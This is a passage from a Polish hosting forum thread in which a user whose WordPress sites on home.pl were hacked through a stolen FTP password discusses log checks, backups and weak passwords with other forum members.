To już trzeba sprawdzić logi. Na ogół to się dzieje po stronie atakującego: w logach widać pobranie pliku, potem pewnie jest jego modyfikacja, i znowu w logach widać zapisanie pliku. Oczywiście to leci w tempie xxx plików na minute więc wiadomo, że to automat leci. Inna opcja to wrzutka jakiegoś przygotowanego pliku przez którego via www łączy się atakujący i coś tam robi. Czy to modyfikuje czy też spamuje lub ogólnie mówiąc robi z Ciebie "zoombie" gotowe na atak czegoś tam / gdzieś tam.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Acha - rozumię i dzięki za odpowiedzi :)

Jesli chodzi o wordpressa - to stały na nim 2 blogi (instalowane przeze mnie) i 1 blog z autoinstalatora.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czyli jest taka mozliwosc ze chcieli zyskac tylko ruch do swoich serwerow - w sposob niewidoczny dla osob korzystajacych z moich stron ?!
Albo i wykorzystac serwer w bardziej nieciekawy sposob.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

W sumie jeśli chodzi o taka firmę jak home.pl z takim kapitałem itp. - to ktoś z Pomocy i/lub administrator powinien być dostępny w święta.

 

"Całodobowe, telefoniczne Biuro Obsługi Klienta (w skrócie BOK). Jako jedyna firma hostingowa na rynku świadczymy rzeczywiste wsparcie Klienta przez 24 godziny na dobę i wszystkie dni w tygodniu, przez cały rok."

 

Mam dopiero pierwszy poważny problem z serwerem i pomoc akurat niedostępna :(:( :(

 

Nigdy na nich nie narzekałem aż do teraz - przynajmniej żeby mieli w panelu administracyjnym opcje przywracania kopii to nie byloby problemu.

Edytowano przez ironman (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nigdy na nich nie narzekałem aż do teraz - przynajmniej żeby mieli w panelu administracyjnym opcje przywracania kopii to nie byloby problemu.

 

Co za problem przywrócić kopię przez ftp? ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

Co za problem przywrócić kopię przez ftp? ;)

 

Jeżeli przyjąć, że jest statystycznym klientem - to problem, bo to oznacza, że jej lokalnie nie posiada ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jeżeli przyjąć, że jest statystycznym klientem - to problem, bo to oznacza, że jej lokalnie nie posiada ;)

 

Chciałem delikatnie uświadomić kolegę, że o czymś zapomniał ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witam.

 

Mam kopię, tylko pare miesięcy nie świeżą.
Po za tym przywrócenie zawartości mojego ftp - to pól dnia kopiowania plików (sa z reguły nieduże po za zdjeciami ale jest ich mnóstwo).

 

Sprostowanie odnośnie firmy home.pl - jednak już ktoś jest przy telefonie i sprawę załatwiłem - zleciłem backup, dowiedziałem się w jaki sposób, z jakiego adres ip i dokładnie kiedy zostałem zaatakowany.

Okazało się że ktoś sie zalogował przez ftp - więc w jakiś sposób musiał zwinąć mi hasło (zapewne trojan)./

 

Kopia już przywrócona :)

Edytowano przez ironman (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

@up

Albo słabe hasło.. :)

 

Niee. Oczywiście jaknajbardziej możliwe ale to na ogół są jakies syfy na windowsa. Niektóre z nich wyłapują z wszystkiego (!!!) co wklepujesz klawiaturą określone ciągi znaków i przesyłają gdzie trzeba. Dlatego pisałem, że po fali gdzie nr 1 był TotaCommander teraz najcześciej jest to jednak robione poziom wyżej ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Należy sprawdzić kiedy pliki zostały zmienione a potem zainteresować się logami serwera www w tym okresie czasu i sprawdzać dziwne wywołania, szczególnie metodą POST.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Testowałem kiedyś sobie jak szybko jest w stanie ktoś się dostać przez ftp nie znając użytkownika i hasła przy łatwym haśle.

 

Przyszedł sobie bocik i w 4 próbie zgadł dane do ftp :) Hasło było 123456 :)

 

Mając łatwe hasło na ftp można mieć problem nawet zanim zadziała antybruteforce.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×